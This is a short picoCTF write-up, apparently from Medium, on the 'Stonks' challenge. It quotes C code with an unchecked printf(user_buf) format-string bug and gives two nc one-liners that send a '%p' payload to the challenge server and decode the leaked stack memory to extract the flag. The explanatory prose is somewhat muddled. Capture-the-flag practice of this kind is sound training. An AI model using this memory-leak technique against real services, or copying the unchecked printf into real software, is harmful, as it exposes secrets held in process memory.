picoCTF Stonks writeup

make and run it:

gcc vuln.c

If the flag is not found locally, it must be on the remote server.

python3 -c 'print("A" * 200)' > api

it works fine.

char *user_buf = malloc(300 + 1); //Allocates memory
printf("What is your API token?\n"); //Prints input prompt
scanf("%300s", user_buf); //Reads in the user input and stores in user_buf
printf("Buying stonks with token:\n"); //Prints info
printf(user_buf); //Outputs user_buff [VULNERABLE!!]

As we can see, the function type is not specified.

printf(user_buf) Will be affected by the format string.

Remote Attack:

python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store